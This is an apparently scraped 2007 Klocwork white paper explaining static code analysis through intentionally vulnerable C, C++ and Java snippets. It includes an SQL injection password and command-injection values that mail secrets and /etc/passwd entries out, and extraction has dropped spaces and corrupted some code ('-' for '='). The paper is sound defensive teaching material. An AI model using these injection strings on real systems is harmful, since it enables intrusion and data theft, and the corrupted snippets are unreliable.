Upload
syamc
View
62
Download
5
Embed Size (px)
Citation preview
When,WhyandHow toLeverageSourceCodeAnalysisTools
Finding critical bugs in C, C++ and Java code
Automatedsourcecodeanalysisistechnologyaimedatlocatinganddescribingareasofweaknessinsourcecode.Thoseweaknessesmightbesecurityvulnerabilities,logicerrors,implementationdefects,concurrencyviolations,rareboundaryconditions,ormanyothertypesofproblem-causingcode.Thenameoftheassociatedresearchfieldisstaticanalysis.Thisisdifferentiatedfrommoretraditionaldynamicanalysistechniquessuchasunitorpenetrationtestbythefactthattheworkisperformedatbuildtimeusingonlythesourcecodeoftheprogramormoduleinquestion.Theresultsreportedarethereforegeneratedfromacompleteviewofeverypossibleexecutionpath,ratherthansomeaspectofanecessarilylimitedobservedruntimebehavior.
Perhapsthemostobviousquestionconfrontinganynewdeveloper-facingtechnologyis:why?
»» Whyshoulddevelopersuseanewtoolwhentheyalreadyhavesomanytochoosefrom?
»» Whatmakesthistechnologycompellingenoughtomakemewanttoaddittomyalreadybloatedbuildchain?
»» Andwhatdoesitdo,anyway?
Thispaperwillanswerthesequestions,andmore.Butforthemomentjustconsiderthefactthatattimeofwriting,80%oftheFortune500havealreadydeployed,orarecurrentlyengagedindeploying,somekindofautomatedsourcecodeanalysis.Thereasonsfordoingsocanbestatedinasmanywaysastherearepeopleansweringthequestion,butthebasicprinciplecanbefoundinallofthesedeployments:
»» Tellmewhat’swrongwithmycodebeforeIshipit–don’tletmebetheguyresponsibleforshippingakillervulnerabilityorbugintothewild.
Thereareothercompellingreasons,suchas:
»» Makemyexistingprocessesforcodereviewmoreeffectivethroughautomation
»» EnhancemyexistingQAresourcewith100%coverageofallboundaryconditions
»» Helpmeprotectmybrandaswegotomarketwithnewproducts
Butthebottomlineremainsthecapabilityofthistechnologytoafforddeveloperstheabilitytoscrubtheircodeofobviousandnot-so-obviousweaknessesastheywork,beforetheysubmittheircodeforcheck-inandmoreformaldown-streamvalidationprocedures.
GWYNFISHER,CTOWHITEPAPER | OCTOBER2007
WWW.KLOCWORK.COM
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 2
IntroductiontotheTechnology____________________________________________________________________________________
Theprocessofautomatedsourcecodeanalysisinvolvesbuildingarichrepresentationormodeloftheprovidedcode(akintoacompilationphase),andthensimulatingallpossibleexecutionpathsthroughthatmodel,mappingouttheflowoflogiconthosepathscoupledwithhowandwheredataobjectsarecreated,usedanddestroyed.
Oncetheprojectionofcodepathsandthemappingofdataobjectsareavailable,wecanlookforanomalousconditionsthateitherwillormightpotentiallycauseexploitablevulnerabilities,executionfailure,ordatacorruptionatruntime.
Therearetwomajorfamiliesofcheckingcapabilitytypicaltothistypeofanalysis:abstractsyntaxtree(AST)validationandcodepathanalysis.Theformercaseismostfrequentlyappliedtovalidationofthebasicsyntaxandstructureofcode,whereasthelatterisusedformorecompletetypesofanalysisthatdependonunderstandingthestateofaprogram’sdataobjectsatanyparticularpointonacodeexecutionpath.
Abstract Syntax TreesAnabstractsyntaxtree,orASTforshort,issimplyatree-structuredrepresentationofthesourcecodeasmightbetypicallygeneratedbythepreliminaryparsingstagesofacompiler.Thistreecontainsarichbreakdownofthestructureofthecodeinanon-ambiguousmanner,allowingforsimplesearchestobeperformedforanomaloussyntax.
Considertheexampleofanorganizationwishingtoenforceasetofcorporatecodingstandards.Statedinthestandardisthebasicrequirementfortheuseofacompoundstatementblockratherthansinglestatementsasthebodyofaloop(e.g.afor-loop).Inthiscase,anASTcheckiswhatwouldbeappropriate:
INCORRECT CORRECT
for( i - 0; i < 10; i++ ) doSomething();
for( i - 0; i < 10; i++ ) {doSomething();}
Inthisexample,the(simplified,forclarity)ASTfortheincorrectcasewouldconceptuallyappearasfollows:
Incontrasttowhich,theASTforthecorrectcasewouldconceptuallyappearasfollows:
Asyoucanimagine,constructingcheckersthatlookforthistypeofstandardsviolationisquitestraightforwardanddependssolelyonthesyntaxofthecodeitselfandnotontheruntimebehavior,orstate,ofthatcode.Essentially,thecheckerwouldbeinstructedtofindallinstancesof“For-loop”nodesthatcontaina“Statement”nodeasanimmediatedescendant,andtoflagthemasviolations.
Similarly,ASTcheckerscaneasilybeconstructedtoenforcestandardsaroundnamingconventions,functioncallrestrictions(e.g.unsafelibrarychecks),etc.Anythingthatcanbeinferredfromthecodewithoutrequiringknowledgeofthatcode’sruntimebehavioristypicallyatargetforASTchecking.
For-loop Statement doSomething()
For-loop Statement block Statement doSomething()
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 3
GiventhesimplenatureofwhatASTcheckerscanactuallydo,therearemanytoolsthatofferthistypeofcheckingforvariousdifferentlanguages,someofwhicharefreelyavailablefromtheopensourcecommunity,forexamplePMDforJava.SeveralofthesetoolsuseXPath,oranXPath-derivedgrammartodefinetheconditionsthatthecheckerslookfor,andcustomersshouldconsideradoptingsolutionsthatprovideextensibilitymechanismsforcreatingASTcheckers.Thistypeofcheckingisrelativelysimpletodo,andconstructingnewcheckersofthistypeforcorporatecodingstandardsorindustryrecommendedbestpracticeisacommonendeavor.
Code Path AnalysisConsidernowamorecomplexexample.Thistimeinsteadoflookingforstyleviolations,wewishtocheckwhetheranattempteddereferenceofapointershouldbeexpectedtosucceedorfail:
Inthiscaseitisobviousfrommanualinspectionthatthevariable“ptr”canassumeaNULLvaluewheneverthevariable“x”isodd,andthatthisconditionwillcauseanunavoidablezero-pagedereference.
AttemptingtofindabugofthistypeusingASTscanning,however,isseriouslynon-trivial.Considerthe(simplified,forclarity)ASTthatwouldbecreatedfromthatsnippetofcode:
Inthiscase,thereisnoobvioustreesearchorsimplenodeenumerationthatcouldcovertheattempted,andatleastoccasionallyillegal,dereferencingof“ptr”inanythinglikeareasonablygeneralizedform.Soforcasessuchasthis,itisnecessarytotakeastepbeyondsimplysearchingforpatternsofsyntax,andtoanalyzethelifecycleofdataobjectsastheyappearandareusedwithinacontrolpath’sflowofexecution.
Codepathanalysistracksobjectswithinacodeexecutionpathandallowscheckerstovalidatethelegalityorcleanlinessofthedataasitgetsused.Intheexampleabove,theASTthatisbuiltforsimpletypesofstyleandsyntaxchecksisrewritteninaformthatallowsananswertobegeneratedforthefollowingquestion:
»» Isthereavalid,reachablecodepathonwhichtheassignmentofNULLisfollowedbyanattempteddereferencewithoutanintermediatecheck?
if( x & 1) ptr - NULL;*ptr - 1,;
Statement Block If-statement Check-Expression Binary-operator & x 1 True-Branch Expression-statement Assignment-operator - ptr 0 Expression-statement Assignment-operator - Dereference-pointer - ptr 1
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 4
Considerthefollowingexampleofcontrolflowanddataobjectusage:
Inthisinstancewewillunavoidablycrashwheneverboth‘x’and‘y’areodd.Findingthissituationrequiresarichrepresentationthatreflectsthestart,ortrigger,ofagivencodepath,anypropagationoraliasingthatoccursduringtheexecutionofthatcodepath,andtheend,orsink,ofthecodepath.
Inourexample,thetriggerforthecodepaththatinterestsusistheassignmentofaNULLvaluetoapointer:
Oncethisassignmentismade,wecanreasonablybeginlookingalongtheensuingreachablecodepathstocheckforpropagationand/orillegalsinkconditions.Inourexample,thefirstpotentialsinkoccursusingthevariable‘p’:
Asthevalueofthepointerischeckedforlegality,however,thisisn’tanillegalsinkconditionandsocanbeignored.Next,wehavepropagation:
Fromthispointforwardsinthereachablecodepathset,referencesto‘q’areasvalidasreferencesto‘p’,astheyarenowaliasesofeachother(untilotherwiseassigned).Knowingthis,thesystemcanagainvalidateapotentialsink:
Inthiscase,itisentirelypossibletofollowalegalcodepathallthewayfromtheassignmentofNULLthroughtotheuseofthatNULLinacrash-causingcontext,andsoapathanalysisdefectwillbereported.
Obviouslythisisonlyonetypeofthemanydifferentquestionsthatcanbeansweredusingthistypeofanalysis,suchas:
»» Isthisnewlycreatedobjectreleasedbeforeallaliasestoitareremovedfromscope?
»» Isthisdataobjecteverrange-checkedbeforebeingpassedtoanOSfunction?»» Isthisstringevercheckedforspecialcharactersbeforebeingsubmitted
asaSQLquery?»» Willthiscopyoperationresultinabufferoverflow?»» Isitsafetocallthisfunctionatthistime?
Byfollowingcodeexecutionpaths,eitherforwardfromatriggereventtowardsatargetscenario,orbackwardsfromatriggereventtowardsarequiredinitialization,wecandeterminetheanswerstothesequestionsandprovideerrorreportswhenthetargetscenarioorinitializationeitherdoesordoesnotoccurasexpected.
Thistypeofcapabilityisrequiredtodosophisticatedanalysisofsourcecodeandcustomersshouldlookfortoolsthatprovidecomprehensivecodepathanalysistoenablethelocationofflawssuchasmemoryleaks,invalidpointerdereferences,unsafeortainteddatapropagation,concurrencyviolations,andmanyothertypesofproblem-causingconditionsasdescribedinthenextsection.
void f(int x, int y) { int value, *p, *q; p = (x & 1) ? NULL : &value; if( p ) *p = 1; q = p; if( y & 1 ) *q = 1;}
p = (x & 1) ? NULL : &value;
if( p ) *p = 1;
q = p;
if( y & 1 ) *q = 1;
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 5
WhatTypeofIssuesCanBeFound?__________________________________________________________________________
Inthissection,wewillwalkthroughanumberofexamplesofproblemsthatcanbeidentifiedusingmodernstaticanalysistools,showinghowtheyoccurandwhatcanhappeniftheyarenotremediedbeforeshipment.WhilstmanymoretypesofweaknesscanbefoundusingKlocwork’stools,theseexamplesshouldgivethereaderafirmgroundinginwhatagoodstaticanalysissuitecando,regardlessofthevendor.
NotethattheexamplesgivenhereareshowninavarietyofC/C++andJava.Whereappropriate,therelevantcapabilitieswithintheproductareavailableinallsupportedlanguages,however.
Security vulnerabilitiesTraditionallyofinteresttodevelopersworkingonconsumer-facingapplications,securityisbecomingmoreandmorecriticaltodevelopersinalltypesofenvironments,eventhosethathaveuntilrecentlyconsideredsecuritytobeanon-issue.Someofthemoreimportantareasofsecuritythatcanbefoundwithsourcecodeanalysisare:
»» Denialofservice»» SQLinjection»» Bufferoverflow»» Cross-sitescripting(XSS)»» Process/fileinjection
Denial of serviceAscouldbeguessedfromthename,thistypeofvulnerabilityreflectsadesireonthepartofanattackertodenyaccesstoaserviceofferedbyoneormoreprocessesunderattack.Thiscanbecausedmanydifferentways,fromactuallycrashingtheprocess,tochokingtheservicewithaninordinatenumberofrequests,toresourceconstrainingtheservicetothepointofitbecominguseless,etc.Attackvectorsthatareexposedtosuchapproachescanoftenbespottedincodethatisnotcreatedtobedefensive,butrathermakesnaïveassumptionsabouttheoperatingenvironmentwithinwhichitwillberunning.
Considerthefollowingexample:
ThissimplefunctioncaneasilycausearesourceconstraintwithinaserverthatwilleventuallyleadtoaDoScondition.Everytimethisfunctioniscalledanewinstanceofthenamedpropertiescollectionwillbecreatedandwillnotbeclosed.Callthisfunctionwithinthemainrequesthandlerofaserviceanditwon’ttakelongfortheservicetocrawltoahalt.
Likewise,creatingresourcesusingdatathathasnotbeenvalidated(apracticeknownastaintpropagation)canquicklychokeaservice:
public void f(String name, Properties props) throws IOException{ InputStream is; is = getClass().getClassLoader().getResourceAsStream(name); if( is != null ) { props.load(is); }}
public void doGet(HttpServletRequest req,HttpServletResponse res){ String val = req.getParameter(“size”); Map props = new HashMap(Integer.parseInt(val)); …}
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 6
Herethetainteddata,asretrievedfromanincomingHTTPparameter,ispassedwithoutvalidationintotheconstructorforaCollectionobject,anoperationthatcaneasilybeattackedtocausetheservicetoshutdown.
NotethatwhilethisexampleusesaJavawebservletrequestfordemonstrationpurposes,manyDoSattackvectorsexistwithinprocessboundaryconditionsthatarenormallyentirelywithinthecontrolofthedeveloperwritingtheapplication.Thistendstoleadtoassumptionsbeingmadeaboutthedatathatwillbemarshaledacrossthatboundary,allowinganattackertodisruptservicesimplybyplacingunexpectedrangesofdataonwhatissupposedtobeacleanwire,asshowninthisexample:
Withoutcheckingthevalueofthe‘bytes’variable,thereisnowaytoguaranteethatthesubsequentallocationwon’tcauseafailure,orpotentiallyworseasignificantconstraintonavailablememoryforotherpartsoftheprocess,tooccur.
SQL InjectionSQL-basedattacksfocusonsloppily-constructedqueriesthatcanresultintheattackerbeingabletocompletelycompromisetheunderlyingdatabasesecuritymodel.Considerthefollowingexampleofaloginvalidationquery:
Incomingparametersfromtheuseraresubstitutedintotheexpressionandthequeryisexecuted.Considerasetofparametersprovidedbyanattacker:
Thatbizarre-lookingpassword,ifnotappropriatelyfilteredbytheapplication,resultsintheloginvalidationqueryperformingaretrievalofeveryIDinthesystem:
Ifthisiscompoundedbytheloginsimplycheckingforsuccessorfailureofthisstatement(asopposedtocountingresultrows),theattackerisquicklygrantedwhateveraccessrightsmightbeavailablefromwhateveruserrecordsareprocessedbytheapplication.Inapplicationswherethefirstrowoftheusertableisreservedforthesuper-user,theapplicationcouldeasilybecompletelycompromised.
Therearemanyotherformsofattackpossibleusingapplicationsthatarenotcarefulintheirtreatmentofsubstitutionstringswithindatabasestatements.Luckily,alargepercentageofthemistakesmostcommonlymadeinpreparingsuchstatementscanbefoundbycheckingstringsthatarebeingprovidedtodatabasefunctionsfortaint,orthelackthereof.
void readDataFromWire(unsigned char* stream){ int bytes = (int)(*stream++); unsigned char* buffer = (unsigned char*)malloc(bytes); …}
SELECT ID FROM USERS WHERE NAME=’user’ AND PWD=’password’;
NAME: xPWD: x’ OR ‘1’ = ‘1
SELECT ID FROM USERS WHERE NAME=’x’ AND PWD=’x’ OR ‘1’ = ‘1’;
public void query(HttpServletRequest req, Connection conn) throws Exception{ Statement stmt = conn.createStatement(); String val = req.getParameter(“User”); stmt.executeQuery(“select * from users where user=’” + val + “’;”);}
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 7
Inthisexample,thetaintedinputvalue“val”wasretrievedfromtheincomingrequestandsubstitutedintoadatabasestatementwithoutfirsthavingbeenscrubbedforcharactersoutsideofthealphanumericrange.Anysuchusageissubjecttoattack,andwillcausewarningstobegeneratedbythetool.
Buffer overflowBuffersorarraysthatareimproperlyhandledcanpotentiallyleadtoprocesscorruptionandeventheexecutionofarbitrarycodeinjectedbyanattacker.Considerthefollowingexample:
Inthistrivialcase,theauthorhasmadeafundamentalassumptionaboutthecleanlinessoftheincomingdata,coupledwithanarchitecturalassumptionabouttherangeofthatdata.Ifthisfunctionisusedinanenvironmentopentoattack,forexampletoprocessmarshaleddatafromanotherprocessorserver,orevenfromafilethatissubjecttoinjectionontheuser’ssystem,theattackercouldcauseconsiderablestackcorruptionsimplybyexploitingthefactthatthecodewillhappilycopyupto255bytesintoabufferabletoholdonly32.Aparticularlyaccomplishedattackercouldusethisexploittoinjectcarefullycraftedcodethateffectivelyhijackstheprocessbyinsertingdummystackcontentandoverwritingoneormorecallframes.
Arecent,highprofilesecuritybreachinMicrosoftWindowswascausedbyexactlythisscenario.The“animatedcursorvulnerability”asitwasknownwascausedbyasectionofcodethateffectivelyperformedthefollowingoperations:
Givensufficienttime,motivationandresource,attackerswereabletocompletelycompromisetargetsystemssimplybyencouraginguserstoloadandusecarefullycraftedanimatedcursorfiles.Thosecursorfilescontainedstructuresguaranteedtocausethisoperationtooverflowavailablespace,tothereforecorruptthestack,andtoplaceontheresultingstackaframeintendedtotransfercontroltofunctionsopentocompromise.
Cross-site scripting (XSS)OneofthefirstrestrictionsplacedonJavaScriptinearlybrowserversionswastobuildawallaroundpagecontentsothatscriptsexecutingwithinaframeservedbyonesitecouldnotaccesscontentofframesservedbyanothersite.Cross-sitescripting,therefore,isanattackpatternthatfocusesonenablingscriptfromonesite(theattacker’ssite)toaccesscontentfromanothersite(e.g.theuser’sbankaccountsite).Inordertodothis,theusermusttypicallyvisiteitheramaliciousoranaïvewebsite,obviously,althoughmanyexperimentsinsocialengineeringhaveshownthatuserscanbefunneledtowardseventhemostoutlandishofsitesquitereadily.
Intermsofphysicalmanifestation,themostcommonformofXSSrequiresunfilteredHTMLtobereflectedbacktotheuserfromaserverrequest.Onecommonearlyattackvectorwassearchengineresultpages,whichtypically
void f(unsigned char* stream){ unsigned char buf[32]; memcpy(buf, stream + 1, *stream); …}
HICON LoadAniIcon(…){ … ANIHEADER myAniHeader; memcpy(&myAniHeader, untrustedData->data, untrustedData->length); …}
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 8
reflectedtheuser’squeryterminthetitleofthepage.Withoutfiltering,thisreflectedquerytermcouldeasilycontainHTMLtagsthatwerenotcorrectlyencodedandwillthereforebeinterpretedasvalidHTMLbythereceivingbrowser.
Inessence,anyreflectionofunfilteredincomingdatawilltriggerawarningfromthetool,asthenumberandvarietyofexploitsresultingfromXSSgrowseveryday.Forexample:
OthermanifestationsofXSSrevolvearoundthepersistentstorageofunfiltereduserinputthatislaterusedtoprovideresponsecontent.ThisisamoredifficulttypeofXSStodiagnose,astheattackpatterndependsnotonlyonauser’sunfilteredinputbeingstored,butonthatstoredtainteddatabeingmadeavailabletoeveryuserfromthatpointonwards.Naïveforumsoftwarepackageswereparticularlysusceptibletothisattackpatternintheearlydaysoftheweb,butinessenceanyapplicationthatstoresincomingunfilteredwebdatainadatabase(orfile)andthenreflectsthatstoreddatabacktotheuseratalaterdateisvulnerabletothispersistentformofXSS.Duetothisattackpatternbeingsodestructiveifexploited,thetooltriggersawarningwheneverunfiltereddataisretrievedfrompersistentstorageandforwardedtotheuser.
Process or file injectionOfparticularvaluetoattackers,andthereforeparticularlytobeavoidedbyauthors,areattackvectorsthatallowthemodificationofsystemcommandsand/orsystemfiles.Performingprocesscreationusingtaintedinput,orcreatingfilesusingtaintednamesorlocationsarethemostprevalentmistakesmade.
Considerthefollowing:
Inthisexampletheauthorhasleftthemselvesopentomaliciousattackbynotscrubbingtheincomingfilenamebeforeappendingittoaninnocuous-lookingcommand.Considerinputthatgetsappendedbythisfunctionwithoutfurtherprocessingtothe“ls”commandsuchas:
or
Ingeneral,anyexitpointtotheunderlyingOSthatuseseitheracommandorfilenamemustbevalidatedforspecialcharacterspriortothecallbeingplaced.Failuretodosomaywellresultincatastrophicresultsfortheoperatingenvironment.
public void doGet(HttpServletRequest req, HttpServletResponse res){ String title = req.getParameter(“searchTerm”); res.getOutputStream().write(title.getBytes(“UTF-8”));}
void doListing(char* name){ char command[256]; if( strlen(name) < 250 ) { sprintf(command, “ls %s”, name); system(command); }}
-R / | grep secret | mail [email protected]
/dev/null | cat /etc/passwd | awk –F: ‘{print $1}’ | mail [email protected]
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 9
Anotherexampleshowsafile-specificattackvector:
Inthisexample,apotentiallytaintedstringisusedtoconstructarelativepathname.Unfortunatelyfortheauthor,theFileconstructorusedhereplacesnorestrictionontheuseof“../”beingapathelement,thusleavingthisapplicationwideopentoarbitraryfilecreationand/oroverwrite.
Implementation defectsRegardlessoftheapplicationbeingdeveloped,implementationdefectsthatescapeintothewildhavesignificantimpactontheproductbeingdeployed.Thiscouldrangefromincreasedsupportcoststoongoingbrandcriticismtobottomlineimpactfrominventoryreversal.Releasingaqualityproductiseverybody’sgoal,andstaticanalysistoolscanhelpsignificantlyinbringingthatproducttomarket.Someofthemoreimportantareasofqualityandongoingmaintenanceare:
»» Memorymanagement;leaks,usingreleasedmemory,etc.»» NULLpointerdereference/exception»» Arrayboundsviolations»» Concurrencyflawsanddeadlocks
Memory management mistakesMemoryallocationandthecorrectreleasingofthatmemoryisamajorsourceofdefects,particularlyinCandC++code.Staticanalysisiswellappliedinthisarea,duetocomprehensivecoverageofcodepathsthatcanresultinrareboundaryconditionsbeingsignaledthatmightneverbefoundusingtraditionalruntimeprofilingtools.
Comprehensivestaticanalysistoolsshouldbeabletotrackallocationsandaliasesofallocatedmemorytoensurethatallallocationsarereleased,thatcodepathsdonotattempttomakeuseofreleasedmemory,andthatmemoryobjectsarenotreleasedtwice.
public void doPost(HttpServletRequest req, HttpServletResponse resp){ String loc = req.getParameter(“name”); unpackFilesTo(loc, req.getInputStream());}private void unpackFilesTo(String loc, InputStream data){ File dir = new File(“./unpacked/”, loc); …}
void f(…){ char* p = (char*)malloc(32); char* q = p; /* Use of unchecked allocation, might well be NULL */ strcpy(p, “hello world”); /* Release the memory by freeing an alias */ free(q); /* Attempted use of already released memory */ strcpy(p, “not good”); free(p);}
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 10
NULL pointer dereferenceDefectsinvolvingNULLpointersareasoldasprogrammingitself,andstillasprevalenttodayasinanytimebefore.WeallunderstandwhatNULLpointerscando,andweallspendtimelookingforthemanddealingwiththeafter-effectsoftheirbeingfoundinthewild.Butconsiderthefollowingexamplecodingpatternthatisfairlyprevalentinevenwell-knownandmoderncodebases:
OrperhapsaJavaexample–justbecausetherearen’tpointersinthelanguagedoesn’tmeanyoucan’tdereferenceaNULLobjectreference:
FunctionsthatreturnNULLunderaberrantconditions,andwhosereturnedvaluesarelaterde-referenced,areparticularlydifficulttodiagnose.Ifthestaticanalyzerisabletoconsidereverypotentialcodepath,howeverunlikely,eventheserareboundaryconditionsarefoundandreported.
Array bounds violationsAccessingarraysoutofboundsisanincrediblycommonmistake,evenbyseniordevelopers.ConsiderthefollowingexamplefromcodewrittenbyavendorinsupportoftheirdeviceunderLinux(detailsobscured):
Inmanyinstances,perhapsthemajorityofthetime,thiscodewillrunwithouthiccup.Buteventuallyitisguaranteedtocauseabusfaultorpageviolationbasedontheindexcheckbeingperformedafterthatindexisusedtoaccessthe‘dev’array.
Concurrency violationsWiththetrendtowardsmoreandmoremulti-coredesignsatthechiplevel,developersareincreasinglybeingcalledupontocreatethreaded,oratleastthread-aware,software.ThisplacesadditionalburdenintermsofunderstandinghowcertainOScallsinteractwithlocksthatcancausethreadstohang,andpotentiallytodeadlocktwoormorethreadsinaprocess.
Onlyahandfuloftools,suchastheonesprovidedbyKlocwork,areabletoapplyvalidationsintheareaofconcurrency,suchasensuringthatthreadsholdinglocksdonotattempttosuspendorhaltthemselves,thatlocksarecorrectlyreleased,andthatlockholdersdonotattemptreal-timepausingactivities.
void f(char* ptr){ if( *ptr && ptr ) …}
public void f(String str){ if( str.length() == 0 || str == null ) return; …}
int f(){ struct devinfo* dev[8]; int i; get_device_info(dev, 8); for( i = 0; dev[i] && (i < 8); i++ ) { … }}
When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 11
Forexample:
Inthispathologicalexample,allthreadsrequiringaccesstothe“lock”mutexwouldbedeadlockedfor30swaitingforthissegmenttounlock.
Worseyet,thefollowingexampleshowsanever-releasedlock:
Inthecasewherethefunction“op”returnszero,thecallingthreadwillmaintainthemutexonreturn.Assumingthislockisbeingusedfortaskschedulingorothertypicalserveractivities,theobviousresultisahungsystem.
Anotheraspectofconcurrencyisconcurrentmodificationofdataobjects.ThefollowingexampleshowsaJavaCollectionoperationthatwillbeflaggedasillegal:
Infact,thisoperationisillegaleveninasinglethreadedenvironmentasitviolatesabasiccontractwithintheCollectionsframework,butinamulti-threadedenvironmentthelikelihoodofthiscausingadatacorruptingproblemwithintheCollectionitselfisvastlyincreased.
Summary__________________________________________________________________________________________________________________
Asadeveloperconsideringusingautomatedsourcecodeanalysis,oradevelopmentmanagerconsideringprovidingsuchanalysistoolsforagroupofcoders,itshouldbeobviousfromtheprevioussectionsofthisdocumentwhatkindofproblemscanbefoundandhowthismightapplyinday-to-daysituations.Inadditiontowhatisdescribedhere,moretypesofproblemscanbefoundbyKlocwork’stools,rangingfromadditionaltypesofsecurityorqualitydefects,tolocatingdeadcode,toincompleteorredundantheaderinclusion,toarchitecturalcoherence,tometricsviolations,andmanyothers.
Oneofthekeyaspectsofanydevelopmenttoolishowitworksforthedeveloper,andbyprovidingIDEintegrationwiththemostcommonlyusedenvironments(VisualStudio,Eclipse,IDEA,WindRiverWorkbench,QNXMomentics,etc.)as
pthread_mutex_t lock;void f(){ pthread_mutex_lock(&lock); sleep(30000); pthread_mutex_unlock(&lock);}
void f(){ pthread_mutex_lock(&lock); switch( op() ) { case 0: return; default: break; } pthread_mutex_unlock(&lock);}
public void f(Collection coll){ for( Iterator it = coll.iterator(); iter.hasNext(); ) { String el = (String)it.next(); if( el.startsWith(“/”) ) coll.remove(el); }}
wellasrobustcommandlinetoolsformoretraditionaldevelopmentenvironments,Klocworkisallaboutsupportingdevelopersintheirnativehabitat.
Whowantstobethepersononthehotseatwhenacriticalvulnerabilityisexploitedinthefield,orwhenacodingmistakecausesaninventoryturnaroundandcostsyourcompanyseriousmoney?Avoidthatexposurebyperformingthemostrigorousformofautomatedcodereviewpossibletoday,anddoitonyourdesktopatthesametimeasyoubuildyourcode.
Klocworkyoursourcecodeandfeelconfidentthatyou’recheckinginthemostsecureanddefect-freecodeyou’veevercreated.
AbouttheAuthor_______________________________________________________________________________________________________
GwynFisheristheCTOofKlocworkandisresponsibleforguidingthecompany’stechnicaldirectionandstrategy.Withnearly20yearsofglobaltechnologyexperience,Gwynbringsavaluablecombinationofvision,experience,anddirectinsightintothedeveloperperspective.Withabackgroundinformalgrammarsandcomputationallinguistics,Gwynhasspentmuchofhiscareerworkinginthesearchandnaturallanguagedomains,holdingseniorexecutivepositionswithcompanieslikeHummingbird,FulcrumTechnologies,PCDOCSandLumaPath.AtKlocwork,Gwynhasreturnedtohisoriginalpassion,compilertheory,andisleveraginghisexperienceandknowledgeofthedevelopermindsettomovethepracticaldomainofstaticanalysistothenextlevel.
AboutKlocwork_________________________________________________________________________________________________________
Klocwork®offersaportfolioofsoftwaredevelopmentproductivitytoolsdesignedtoensurethesecurity,qualityandmaintainabilityofcomplexcodebases.Usingprovenstaticanalysistechnology,Klocwork’stoolsidentifycriticalsecurityvulnerabilitiesandqualitydefects,optimizepeercodereview,andhelpdeveloperscreatemoremaintainablecode.Klocwork’stoolsareanintegralpartofthedevelopmentprocessforover850customersintheconsumerelectronics,mobiledevices,medicaltechnologies,telecom,militaryandaerospacesectors.
IN THE UNITED STATES:15 New England Executive ParkBurlington, MA 01803
IN CANADA:30 Edgewater Street, Suite 114Ottawa, ON K2L 1V8
t: 1.866.556.2967f: 613.836.9088www.klOCwORk.COm
© Copyright Klocwork Inc. 2010 · All Rights Reserved